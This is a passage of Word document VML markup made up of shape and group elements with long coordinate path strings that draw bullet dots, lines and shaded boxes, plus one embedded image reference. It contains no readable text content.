,1510,15372,1510,15368,1510,15364,1510,15360,1510,15355,1510,15351,1510,15346,1510,15341,1510,15336,1510,15331,1510,15326,1510,15321,1510,15315,1510,15310,1510,15304,1510,15299,1510,15293,1510,15287,1510,15281,1510,15274,1510,15268,1510,15262,1510,15255,1510,15248,1510,15241,1510,15234,1510,15227,1510,15220,1510,15213,1510,15205,1510,15197,1510,15189,1510,15182,1510,15173,1510,15165,1510,15157,1510,15148,1510,15139,1510,15131,1510,15122e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:755.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15110" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:15110;width:30;height:370" coordorigin="1490,15110" coordsize="30,370" path="m1517,15122l1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15122,1517,15123,1517,15123,1517,15123,1517,15123,1517,15124,1517,15124,1517,15124,1517,15125,1517,15125,1517,15125,1517,15126,1517,15126,1517,15127,1517,15127,1517,15128,1517,15129,1517,15129,1517,15130,1517,15131,1517,15132,1517,15132,1517,15133,1517,15134,1517,15135,1517,15136,1517,15137,1517,15139,1517,15140,1517,15141,1517,15142,1517,15144,1517,15145,1517,15147,1517,15148,1517,15150,1517,15152,1517,15153,1517,15155,1517,15157,1517,15159,1517,15161,1517,15163,1517,15166,1517,15168,1517,15170,1517,15173,1517,15175,1517,15178,1517,15180,1517,15183,1517,15186,1517,15189,1517,15192,1517,15195,1517,15198,1517,15201,1517,15205,1517,15208,1517,15212,1517,15215,1517,15219,1517,15223,1517,15227,1517,15231,1517,15235,1517,15239,1517,15244,1517,15248,1517,15253,1517,15258,1517,15262,1517,15267,1517,15272,1517,15277,1517,15283,1517,15288,1517,15294,1517,15299,1517,15305,1517,15311,1517,15317,1517,15323,1517,15329,1517,15335,1517,15342,1517,15348,1517,15355,1517,15362,1517,15369,1517,15376,1517,15383,1517,15391,1517,15398,1517,15406,1517,15414,1517,15422,1517,15430,1517,15438,1517,15447,1517,15455,1517,15464,1517,15473,1517,15482e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:244.800pt;width:467.400pt;height:126.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId23" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:419.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,8390" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:8390;width:110;height:110" coordorigin="1790,8390" coordsize="110,110" path="m1900,8458l1900,8458,1900,8459,1900,8460,1900,8461,1900,8461,1900,8462,1900,8463,1900,8463,1900,8464,1900,8465,1900,8466,1900,8466,1899,8467,1899,8468,1899,8468,1899,8469,1899,8470,1899,8470,1899,8471,1899,8471,1899,8472,1899,8473,1898,8473,1898,8474,1898,8475,1898,8475,1898,8476,1898,8476,1897,8477,1897,8478,1897,8478,1897,8479,1897,8479,1896,8480,1896,8480,1896,8481,1896,8481,1896,8482,1895,8482,1895,8483,1895,8483,1895,8484,1894,8484,1894,8485,1894,8485,1894,8486,1893,8486,1893,8487,1893,8487,1892,8488,1892,8488,1892,8489,1891,8489,1891,8489,1891,8490,1890,8490,1890,8491,1890,8491,1889,8491,1889,8492,1889,8492,1888,8493,1888,8493,1887,8493,1887,8494,1887,8494,1886,8494,1886,8495,1885,8495,1885,8495,1884,8496,1884,8496,1883,8496,1883,8497,1883,8497,1882,8497,1882,8497,1881,8498,1881,8498,1880,8498,1880,8498,1879,8499,1879,8499,1878,8499,1878,8499,1877,8500,1876,8500,1876,8500,1875,8500,1875,8500,1874,8501,1874,8501,1873,8501,1872,8501,1872,8501,1871,8501,1871,8502,1870,8502,1869,8502,1869,8502,1868,8502,1868,8502,1867,8502,1866,8502,1866,8503,1865,8503,1864,8503,1864,8503,1863,8503,1862,8503,1861,8503,1861,8503,1860,8503,1859,8503,1859,8503,1858,8503,1857,8503,1856,8503,1856,8503,1855,8503,1855,8503,1854,8503,1853,8503,1853,8503,1852,8503,1851,8503,1851,8503,1850,8503,1849,8503,1848,8503,1848,8503,1847,8503,1846,8503,1846,8503,1845,8503,1844,8503,1844,8502,1843,8502,1842,8502,1842,8502,1841,8502,1840,8502,1840,8502,1839,8502,1839,8501,1838,8501,1837,8501,1837,8501,1836,8501,1836,8501,1835,8500,1835,8500,1834,8500,1833,8500,1833,8500,1832,8499,1832,8499,1831,8499,1831,8499,1830,8498,1830,8498,1829,8498,1829,8498,1828,8497,1828,8497,1827,8497,1827,8497,1826,8496,1826,8496,1825,8496,1825,8495,1825,8495,1824,8495,1824,8494,1823,8494,1823,8494,1823,8493,1822,8493,1822,8493,1821,8492,1821,8492,1821,8491,1820,8491,1820,8491,1820,8490,1819,8490,1819,8489,1819,8489,1818,8489,1818,8488,1818,8488,1817,8487,1817,8487,1817,8486,1816,8486,1816,8485,1816,8485,1816,8484,1815,8484,1815,8483,1815,8483,1815,8482,1814,8482,1814,8481,1814,8481,1814,8480,1813,8480,1813,8479,1813,8479,1813,8478,1813,8478,1812,8477,1812,8476,1812,8476,1812,8475,1812,8475,1812,8474,1811,8473,1811,8473,1811,8472,1811,8471,1811,8471,1811,8470,1811,8470,1811,8469,1811,8468,1810,8468,1810,8467,1810,8466,1810,8466,1810,8465,1810,8464,1810,8463,1810,8463,1810,8462,1810,8461,1810,8461,1810,8460,1810,8459,1810,8458,1810,8458,1810,8458,1810,8457,1810,8456,1810,8455,1810,8455,1810,8454,1810,8453,1810,8452,1810,8452,1810,8451,1810,8450,1810,8450,1810,8449,1811,8448,1811,8448,1811,8447,1811,8446,1811,8446,1811,8445,1811,8444,1811,8444,1811,8443,1812,8443,1812,8442,1812,8441,1812,8441,1812,8440,1812,8440,1813,8439,1813,8438,1813,8438,1813,8437,1813,8437,1814,8436,1814,8436,1814,8435,1814,8435,1815,8434,1815,8434,1815,8433,1815,8433,1816,8432,1816,8432,1816,8431,1816,8431,1817,8430,1817,8430,1817,8429,1818,8429,1818,8428,1818,8428,1819,8428,1819,8427,1819,8427,1820,8426,1820,8426,1820,8425,1821,8425,1821,8425,1821,8424,1822,8424,1822,8424,1823,8423,1823,8423,1823,8423,1824,8422,1824,8422,1825,8422,1825,8421,1825,8421,1826,8421,1826,8420,1827,8420,1827,8420,1828,8419,1828,8419,1829,8419,1829,8419,1830,8418,1830,8418,1831,8418,1831,8418,1832,8417,1832,8417,1833,8417,1833,8417,1834,8416,1835,8416,1835,8416,1836,8416,1836,8416,1837,8416,1837,8415,1838,8415,1839,8415,1839,8415,1840,8415,1840,8415,1841,8415,1842,8414,1842,8414,1843,8414,1844,8414,1844,8414,1845,8414,1846,8414,1846,8414,1847,8414,1848,8414,1848,8413,1849,8413,1850,8413,1851,8413,1851,8413,1852,8413,1853,8413,1853,8413,1854,8413,1855,8413,1855,8413,1856,8413,1856,8413,1857,8413,1858,8413,1859,8413,1859,8413,1860,8413,1861,8413,1861,8413,1862,8414,1863,8414,1864,8414,1864,8414,1865,8414,1866,8414,1866,8414,1867,8414,1868,8414,1868,8414,1869,8415,1869,8415,1870,8415,1871,8415,1871,8415,1872,8415,1872,8415,1873,8416,1874,8416,1874,8416,1875,8416,1875,8416,1876,8416,1876,8417,1877,8417,1878,8417,1878,8417,1879,8418,1879,8418,1880,8418,1880,8418,1881,8419,1881,8419,1882,8419,1882,8419,1883,8420,1883,8420,1883,8420,1884,8421,1884,8421,1885,8421,1885,8422,1886,8422,1886,8422,1887,8423,1887,8423,1887,8423,1888,8424,1888,8424,1889,8424,1889,8425,1889,8425,1890,8425,1890,8426,1890,8426,1891,8427,1891,8427,1891,8428,1892,8428,1892,8428,1892,8429,1893,8429,1893,8430,1893,8430,1894,8431,1894,8431,1894,8432,1894,8432,1895,8433,1895,8433,1895,8434,1895,8434,1896,8435,1896,8435,1896,8436,1896,8436,1896,8437,1897,8437,1897,8438,1897,8438,1897,8439,1897,8440,1898,8440,1898,8441,1898,8441,1898,8442,1898,8443,1898,8443,1899,8444,1899,8444,1899,8445,1899,8446,1899,8446,1899,8447,1899,8448,1899,8448,1899,8449,1899,8450,1900,8450,1900,8451,1900,8452,1900,8452,1900,8453,1900,8454,1900,8455,1900,8455,1900,8456,1900,8457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,1900,8458e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:440.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,8810" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:8810;width:110;height:110" coordorigin="1790,8810" coordsize="110,110" path="m1900,8878l1900,8878,1900,8879,1900,8880,1900,8881,1900,8881,1900,8882,1900,8883,1900,8884,1900,8884,1900,8885,1900,8886,1900,8886,1899,8887,1899,8888,1899,8888,1899,8889,1899,8890,1899,8890,1899,8891,1899,8892,1899,8892,1899,8893,1898,8894,1898,8894,1898,8895,1898,8895,1898,8896,1898,8897,1897,8897,1897,8898,1897,8898,1897,8899,1897,8899,1896,8900,1896,8901,1896,8901,1896,8902,1896,8902,1895,8903,1895,8903,1895,8904,1895,8904,1894,8905,1894,8905,1894,8906,1894,8906,1893,8907,1893,8907,1893,8907,1892,8908,1892,8908,1892,8909,1891,8909,1891,8910,1891,8910,1890,8910,1890,8911,1890,8911,1889,8912,1889,8912,1889,8912,1888,8913,1888,8913,1887,8914,1887,8914,1887,8914,1886,8915,1886,8915,1885,8915,1885,8916,1884,8916,1884,8916,1883,8916,1883,8917,1883,8917,1882,8917,1882,8918,1881,8918,1881,8918,1880,8918,1880,8919,1879,8919,1879,8919,1878,8919,1878,8920,1877,8920,1876,8920,1876,8920,1875,8920,1875,8921,1874,8921,1874,8921,1873,8921,1872,8921,1872,8922,1871,8922,1871,8922,1870,8922,1869,8922,1869,8922,1868,8922,1868,8922,1867,8923,1866,8923,1866,8923,1865,8923,1864,8923,1864,8923,1863,8923,1862,8923,1861,8923,1861,8923,1860,8923,1859,8923,1859,8923,1858,8923,1857,8923,1856,8923,1856,8923,1855,8923,1855,8923,1854,8923,1853,8923,1853,8923,1852,8923,1851,8923,1851,8923,1850,8923,1849,8923,1848,8923,1848,8923,1847,8923,1846,8923,1846,8923,1845,8923,1844,8923,1844,8923,1843,8923,1842,8922,1842,8922,1841,8922,1840,8922,1840,8922,1839,8922,1839,8922,1838,8922,1837,8921,1837,8921,1836,8921,1836,8921,1835,8921,1835,8920,1834,8920,1833,8920,1833,8920,1832,8920,1832,8919,1831,8919,1831,8919,1830,8919,1830,8918,1829,8918,1829,8918,1828,8918,1828,8917,1827,8917,1827,8917,1826,8916,1826,8916,1825,8916,1825,8916,1825,8915,1824,8915,1824,8915,1823,8914,1823,8914,1823,8914,1822,8913,1822,8913,1821,8912,1821,8912,1821,8912,1820,8911,1820,8911,1820,8910,1819,8910,1819,8910,1819,8909,1818,8909,1818,8908,1818,8908,1817,8907,1817,8907,1817,8907,1816,8906,1816,8906,1816,8905,1816,8905,1815,8904,1815,8904,1815,8903,1815,8903,1814,8902,1814,8902,1814,8901,1814,8901,1813,8900,1813,8899,1813,8899,1813,8898,1813,8898,1812,8897,1812,8897,1812,8896,1812,8895,1812,8895,1812,8894,1811,8894,1811,8893,1811,8892,1811,8892,1811,8891,1811,8890,1811,8890,1811,8889,1811,8888,1810,8888,1810,8887,1810,8886,1810,8886,1810,8885,1810,8884,1810,8884,1810,8883,1810,8882,1810,8881,1810,8881,1810,8880,1810,8879,1810,8878,1810,8878,1810,8878,1810,8877,1810,8876,1810,8875,1810,8875,1810,8874,1810,8873,1810,8873,1810,8872,1810,8871,1810,8871,1810,8870,1810,8869,1811,8869,1811,8868,1811,8867,1811,8867,1811,8866,1811,8865,1811,8865,1811,8864,1811,8863,1812,8863,1812,8862,1812,8862,1812,8861,1812,8860,1812,8860,1813,8859,1813,8859,1813,8858,1813,8858,1813,8857,1814,8856,1814,8856,1814,8855,1814,8855,1815,8854,1815,8854,1815,8853,1815,8853,1816,8852,1816,8852,1816,8851,1816,8851,1817,8850,1817,8850,1817,8849,1818,8849,1818,8849,1818,8848,1819,8848,1819,8847,1819,8847,1820,8846,1820,8846,1820,8846,1821,8845,1821,8845,1821,8845,1822,8844,1822,8844,1823,8843,1823,8843,1823,8843,1824,8842,1824,8842,1825,8842,1825,8841,1825,8841,1826,8841,1826,8840,1827,8840,1827,8840,1828,8840,1828,8839,1829,8839,1829,8839,1830,8839,1830,8838,1831,8838,1831,8838,1832,8838,1832,8837,1833,8837,1833,8837,1834,8837,1835,8837,1835,8836,1836,8836,1836,8836,1837,8836,1837,8836,1838,8835,1839,8835,1839,8835,1840,8835,1840,8835,1841,8835,1842,8835,1842,8834,1843,8834,1844,8834,1844,8834,1845,8834,1846,8834,1846,8834,1847,8834,1848,8834,1848,8834,1849,8834,1850,8834,1851,8834,1851,8834,1852,8834,1853,8833,1853,8833,1854,8833,1855,8833,1855,8833,1856,8833,1856,8833,1857,8833,1858,8834,1859,8834,1859,8834,1860,8834,1861,8834,1861,8834,1862,8834,1863,8834,1864,8834,1864,8834,1865,8834,1866,8834,1866,8834,1867,8834,1868,8834,1868,8835,1869,8835,1869,8835,1870,8835,1871,8835,1871,8835,1872,8835,1872,8836,1873,8836,1874,8836,1874,8836,1875,8836,1875,8837,1876,8837,1876,8837,1877,8837,1878,8837,1878,8838,1879,8838,1879,8838,1880,8838,1880,8839,1881,8839,1881,8839,1882,8839,1882,8840,1883,8840,1883,8840,1883,8840,1884,8841,1884,8841,1885,8841,1885,8842,1886,8842,1886,8842,1887,8843,1887,8843,1887,8843,1888,8844,1888,8844,1889,8845,1889,8845,1889,8845,1890,8846,1890,8846,1890,8846,1891,8847,1891,8847,1891,8848,1892,8848,1892,8849,1892,8849,1893,8849,1893,8850,1893,8850,1894,8851,1894,8851,1894,8852,1894,8852,1895,8853,1895,8853,1895,8854,1895,8854,1896,8855,1896,8855,1896,8856,1896,8856,1896,8857,1897,8858,1897,8858,1897,8859,1897,8859,1897,8860,1898,8860,1898,8861,1898,8862,1898,8862,1898,8863,1898,8863,1899,8864,1899,8865,1899,8865,1899,8866,1899,8867,1899,8867,1899,8868,1899,8869,1899,8869,1899,8870,1900,8871,1900,8871,1900,8872,1900,8873,1900,8873,1900,8874,1900,8875,1900,8875,1900,8876,1900,8877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,1900,8878e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:461.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,9230" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:9230;width:110;height:110" coordorigin="1790,9230" coordsize="110,110" path="m1900,9299l1900,9299,1900,9299,1900,9300,1900,9301,1900,9302,1900,9302,1900,9303,1900,9304,1900,9305,1900,9305,1900,9306,1900,9307,1899,9307,1899,9308,1899,9309,1899,9309,1899,9310,1899,9311,1899,9311,1899,9312,1899,9313,1899,9313,1898,9314,1898,9314,1898,9315,1898,9316,1898,9316,1898,9317,1897,9317,1897,9318,1897,9319,1897,9319,1897,9320,1896,9320,1896,9321,1896,9321,1896,9322,1896,9322,1895,9323,1895,9323,1895,9324,1895,9324,1894,9325,1894,9325,1894,9326,1894,9326,1893,9327,1893,9327,1893,9328,1892,9328,1892,9329,1892,9329,1891,9329,1891,9330,1891,9330,1890,9331,1890,9331,1890,9331,1889,9332,1889,9332,1889,9333,1888,9333,1888,9333,1887,9334,1887,9334,1887,9334,1886,9335,1886,9335,1885,9335,1885,9336,1884,9336,1884,9336,1883,9337,1883,9337,1883,9337,1882,9338,1882,9338,1881,9338,1881,9338,1880,9339,1880,9339,1879,9339,1879,9339,1878,9340,1878,9340,1877,9340,1876,9340,1876,9340,1875,9341,1875,9341,1874,9341,1874,9341,1873,9341,1872,9342,1872,9342,1871,9342,1871,9342,1870,9342,1869,9342,1869,9342,1868,9343,1868,9343,1867,9343,1866,9343,1866,9343,1865,9343,1864,9343,1864,9343,1863,9343,1862,9343,1861,9343,1861,9344,1860,9344,1859,9344,1859,9344,1858,9344,1857,9344,1856,9344,1856,9344,1855,9344,1855,9344,1854,9344,1853,9344,1853,9344,1852,9344,1851,9344,1851,9344,1850,9344,1849,9344,1848,9343,1848,9343,1847,9343,1846,9343,1846,9343,1845,9343,1844,9343,1844,9343,1843,9343,1842,9343,1842,9343,1841,9342,1840,9342,1840,9342,1839,9342,1839,9342,1838,9342,1837,9342,1837,9341,1836,9341,1836,9341,1835,9341,1835,9341,1834,9340,1833,9340,1833,9340,1832,9340,1832,9340,1831,9339,1831,9339,1830,9339,1830,9339,1829,9338,1829,9338,1828,9338,1828,9338,1827,9337,1827,9337,1826,9337,1826,9336,1825,9336,1825,9336,1825,9335,1824,9335,1824,9335,1823,9334,1823,9334,1823,9334,1822,9333,1822,9333,1821,9333,1821,9332,1821,9332,1820,9331,1820,9331,1820,9331,1819,9330,1819,9330,1819,9329,1818,9329,1818,9329,1818,9328,1817,9328,1817,9327,1817,9327,1816,9326,1816,9326,1816,9325,1816,9325,1815,9324,1815,9324,1815,9323,1815,9323,1814,9322,1814,9322,1814,9321,1814,9321,1813,9320,1813,9320,1813,9319,1813,9319,1813,9318,1812,9317,1812,9317,1812,9316,1812,9316,1812,9315,1812,9314,1811,9314,1811,9313,1811,9313,1811,9312,1811,9311,1811,9311,1811,9310,1811,9309,1811,9309,1810,9308,1810,9307,1810,9307,1810,9306,1810,9305,1810,9305,1810,9304,1810,9303,1810,9302,1810,9302,1810,9301,1810,9300,1810,9299,1810,9299,1810,9299,1810,9298,1810,9297,1810,9296,1810,9296,1810,9295,1810,9294,1810,9294,1810,9293,1810,9292,1810,9291,1810,9291,1810,9290,1810,9289,1811,9289,1811,9288,1811,9287,1811,9287,1811,9286,1811,9285,1811,9285,1811,9284,1811,9284,1812,9283,1812,9282,1812,9282,1812,9281,1812,9281,1812,9280,1813,9279,1813,9279,1813,9278,1813,9278,1813,9277,1814,9277,1814,9276,1814,9276,1814,9275,1815,9275,1815,9274,1815,9274,1815,9273,1816,9273,1816,9272,1816,9272,1816,9271,1817,9271,1817,9270,1817,9270,1818,9269,1818,9269,1818,9268,1819,9268,1819,9268,1819,9267,1820,9267,1820,9266,1820,9266,1821,9265,1821,9265,1821,9265,1822,9264,1822,9264,1823,9264,1823,9263,1823,9263,1824,9263,1824,9262,1825,9262,1825,9262,1825,9261,1826,9261,1826,9261,1827,9260,1827,9260,1828,9260,1828,9260,1829,9259,1829,9259,1830,9259,1830,9258,1831,9258,1831,9258,1832,9258,1832,9258,1833,9257,1833,9257,1834,9257,1835,9257,1835,9257,1836,9256,1836,9256,1837,9256,1837,9256,1838,9256,1839,9255,1839,9255,1840,9255,1840,9255,1841,9255,1842,9255,1842,9255,1843,9255,1844,9254,1844,9254,1845,9254,1846,9254,1846,9254,1847,9254,1848,9254,1848,9254,1849,9254,1850,9254,1851,9254,1851,9254,1852,9254,1853,9254,1853,9254,1854,9254,1855,9254,1855,9254,1856,9254,1856,9254,1857,9254,1858,9254,1859,9254,1859,9254,1860,9254,1861,9254,1861,9254,1862,9254,1863,9254,1864,9254,1864,9254,1865,9254,1866,9254,1866,9254,1867,9255,1868,9255,1868,9255,1869,9255,1869,9255,1870,9255,1871,9255,1871,9255,1872,9256,1872,9256,1873,9256,1874,9256,1874,9256,1875,9257,1875,9257,1876,9257,1876,9257,1877,9257,1878,9258,1878,9258,1879,9258,1879,9258,1880,9258,1880,9259,1881,9259,1881,9259,1882,9260,1882,9260,1883,9260,1883,9260,1883,9261,1884,9261,1884,9261,1885,9262,1885,9262,1886,9262,1886,9263,1887,9263,1887,9263,1887,9264,1888,9264,1888,9264,1889,9265,1889,9265,1889,9265,1890,9266,1890,9266,1890,9267,1891,9267,1891,9268,1891,9268,1892,9268,1892,9269,1892,9269,1893,9270,1893,9270,1893,9271,1894,9271,1894,9272,1894,9272,1894,9273,1895,9273,1895,9274,1895,9274,1895,9275,1896,9275,1896,9276,1896,9276,1896,9277,1896,9277,1897,9278,1897,9278,1897,9279,1897,9279,1897,9280,1898,9281,1898,9281,1898,9282,1898,9282,1898,9283,1898,9284,1899,9284,1899,9285,1899,9285,1899,9286,1899,9287,1899,9287,1899,9288,1899,9289,1899,9289,1899,9290,1900,9291,1900,9291,1900,9292,1900,9293,1900,9294,1900,9294,1900,9295,1900,9296,1900,9296,1900,9297,1900,9298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,1900,9299e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:482.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,9650" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:9650;width:110;height:110" coordorigin="1790,9650" coordsize="110,110" path="m1900,9719l1900,9719,1900,9720,1900,9720,1900,9721,1900,9722,1900,9723,1900,9723,1900,9724,1900,9725,1900,9725,1900,9726,1900,9727,1899,9728,1899,9728,1899,9729,1899,9730,1899,9730,1899,9731,1899,9731,1899,9732,1899,9733,1899,9733,1898,9734,1898,9735,1898,9735,1898,9736,1898,9736,1898,9737,1897,9738,1897,9738,1897,9739,1897,9739,1897,9740,1896,9740,1896,9741,1896,9741,1896,9742,1896,9743,1895,9743,1895,9744,1895,9744,1895,9745,1894,9745,1894,9746,1894,9746,1894,9747,1893,9747,1893,9747,1893,9748,1892,9748,1892,9749,1892,9749,1891,9750,1891,9750,1891,9750,1890,9751,1890,9751,1890,9752,1889,9752,1889,9752,1889,9753,1888,9753,1888,9754,1887,9754,1887,9754,1887,9755,1886,9755,1886,9755,1885,9756,1885,9756,1884,9756,1884,9757,1883,9757,1883,9757,1883,9757,1882,9758,1882,9758,1881,9758,1881,9759,1880,9759,1880,9759,1879,9759,1879,9760,1878,9760,1878,9760,1877,9760,1876,9760,1876,9761,1875,9761,1875,9761,1874,9761,1874,9761,1873,9762,1872,9762,1872,9762,1871,9762,1871,9762,1870,9762,1869,9763,1869,9763,1868,9763,1868,9763,1867,9763,1866,9763,1866,9763,1865,9763,1864,9763,1864,9763,1863,9764,1862,9764,1861,9764,1861,9764,1860,9764,1859,9764,1859,9764,1858,9764,1857,9764,1856,9764,1856,9764,1855,9764,1855,9764,1854,9764,1853,9764,1853,9764,1852,9764,1851,9764,1851,9764,1850,9764,1849,9764,1848,9764,1848,9764,1847,9764,1846,9763,1846,9763,1845,9763,1844,9763,1844,9763,1843,9763,1842,9763,1842,9763,1841,9763,1840,9763,1840,9762,1839,9762,1839,9762,1838,9762,1837,9762,1837,9762,1836,9761,1836,9761,1835,9761,1835,9761,1834,9761,1833,9760,1833,9760,1832,9760,1832,9760,1831,9760,1831,9759,1830,9759,1830,9759,1829,9759,1829,9758,1828,9758,1828,9758,1827,9757,1827,9757,1826,9757,1826,9757,1825,9756,1825,9756,1825,9756,1824,9755,1824,9755,1823,9755,1823,9754,1823,9754,1822,9754,1822,9753,1821,9753,1821,9752,1821,9752,1820,9752,1820,9751,1820,9751,1819,9750,1819,9750,1819,9750,1818,9749,1818,9749,1818,9748,1817,9748,1817,9747,1817,9747,1816,9747,1816,9746,1816,9746,1816,9745,1815,9745,1815,9744,1815,9744,1815,9743,1814,9743,1814,9742,1814,9741,1814,9741,1813,9740,1813,9740,1813,9739,1813,9739,1813,9738,1812,9738,1812,9737,1812,9736,1812,9736,1812,9735,1812,9735,1811,9734,1811,9733,1811,9733,1811,9732,1811,9731,1811,9731,1811,9730,1811,9730,1811,9729,1810,9728,1810,9728,1810,9727,1810,9726,1810,9725,1810,9725,1810,9724,1810,9723,1810,9723,1810,9722,1810,9721,1810,9720,1810,9720,1810,9719,1810,9719,1810,9718,1810,9717,1810,9717,1810,9716,1810,9715,1810,9714,1810,9714,1810,9713,1810,9712,1810,9712,1810,9711,1810,9710,1810,9710,1811,9709,1811,9708,1811,9708,1811,9707,1811,9706,1811,9706,1811,9705,1811,9704,1811,9704,1812,9703,1812,9703,1812,9702,1812,9701,1812,9701,1812,9700,1813,9700,1813,9699,1813,9698,1813,9698,1813,9697,1814,9697,1814,9696,1814,9696,1814,9695,1815,9695,1815,9694,1815,9694,1815,9693,1816,9693,1816,9692,1816,9692,1816,9691,1817,9691,1817,9690,1817,9690,1818,9689,1818,9689,1818,9689,1819,9688,1819,9688,1819,9687,1820,9687,1820,9686,1820,9686,1821,9686,1821,9685,1821,9685,1822,9685,1822,9684,1823,9684,1823,9683,1823,9683,1824,9683,1824,9682,1825,9682,1825,9682,1825,9682,1826,9681,1826,9681,1827,9681,1827,9680,1828,9680,1828,9680,1829,9679,1829,9679,1830,9679,1830,9679,1831,9678,1831,9678,1832,9678,1832,9678,1833,9678,1833,9677,1834,9677,1835,9677,1835,9677,1836,9677,1836,9676,1837,9676,1837,9676,1838,9676,1839,9676,1839,9676,1840,9675,1840,9675,1841,9675,1842,9675,1842,9675,1843,9675,1844,9675,1844,9675,1845,9674,1846,9674,1846,9674,1847,9674,1848,9674,1848,9674,1849,9674,1850,9674,1851,9674,1851,9674,1852,9674,1853,9674,1853,9674,1854,9674,1855,9674,1855,9674,1856,9674,1856,9674,1857,9674,1858,9674,1859,9674,1859,9674,1860,9674,1861,9674,1861,9674,1862,9674,1863,9674,1864,9674,1864,9674,1865,9674,1866,9675,1866,9675,1867,9675,1868,9675,1868,9675,1869,9675,1869,9675,1870,9675,1871,9676,1871,9676,1872,9676,1872,9676,1873,9676,1874,9676,1874,9677,1875,9677,1875,9677,1876,9677,1876,9677,1877,9678,1878,9678,1878,9678,1879,9678,1879,9678,1880,9679,1880,9679,1881,9679,1881,9679,1882,9680,1882,9680,1883,9680,1883,9681,1883,9681,1884,9681,1884,9682,1885,9682,1885,9682,1886,9682,1886,9683,1887,9683,1887,9683,1887,9684,1888,9684,1888,9685,1889,9685,1889,9685,1889,9686,1890,9686,1890,9686,1890,9687,1891,9687,1891,9688,1891,9688,1892,9689,1892,9689,1892,9689,1893,9690,1893,9690,1893,9691,1894,9691,1894,9692,1894,9692,1894,9693,1895,9693,1895,9694,1895,9694,1895,9695,1896,9695,1896,9696,1896,9696,1896,9697,1896,9697,1897,9698,1897,9698,1897,9699,1897,9700,1897,9700,1898,9701,1898,9701,1898,9702,1898,9703,1898,9703,1898,9704,1899,9704,1899,9705,1899,9706,1899,9706,1899,9707,1899,9708,1899,9708,1899,9709,1899,9710,1899,9710,1900,9711,1900,9712,1900,9712,1900,9713,1900,9714,1900,9714,1900,9715,1900,9716,1900,9717,1900,9717,1900,9718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,1900,9719e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:593.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,11870" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:11870;width:130;height:250" coordorigin="4710,11870" coordsize="130,250" path="m4736,11880l4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4736,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4737,11880,4738,11880,4738,11880,4738,11880,4738,11880,4738,11880,4739,11880,4739,11880,4739,11880,4739,11880,4739,11880,4740,11880,4740,11880,4740,11880,4741,11880,4741,11880,4741,11880,4742,11880,4742,11880,4742,11880,4743,11880,4743,11880,4744,11880,4744,11880,4745,11880,4745,11880,4746,11880,4746,11880,4747,11880,4748,11880,4748,11880,4749,11880,4750,11880,4750,11880,4751,11880,4752,11880,4753,11880,4753,11880,4754,11880,4755,11880,4756,11880,4757,11880,4758,11880,4759,11880,4760,11880,4761,11880,4762,11880,4763,11880,4764,11880,4765,11880,4766,11880,4768,11880,4769,11880,4770,11880,4772,11880,4773,11880,4774,11880,4776,11880,4777,11880,4779,11880,4780,11880,4782,11880,4783,11880,4785,11880,4787,11880,4788,11880,4790,11880,4792,11880,4794,11880,4796,11880,4797,11880,4799,11880,4801,11880,4803,11880,4806,11880,4808,11880,4810,11880,4812,11880,4814,11880,4817,11880,4819,11880,4821,11880,4824,11880,4826,11880,4829,11880,4831,11880,4834,11880,4836,11880,4839,11880,4842,11880,4845,11880,4848,11880,4850,11880,4853,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11880,4856,11881,4856,11881,4856,11881,4856,11881,4856,11881,4856,11881,4856,11882,4856,11882,4856,11882,4856,11882,4856,11883,4856,11883,4856,11883,4856,11884,4856,11884,4856,11884,4856,11885,4856,11885,4856,11886,4856,11886,4856,11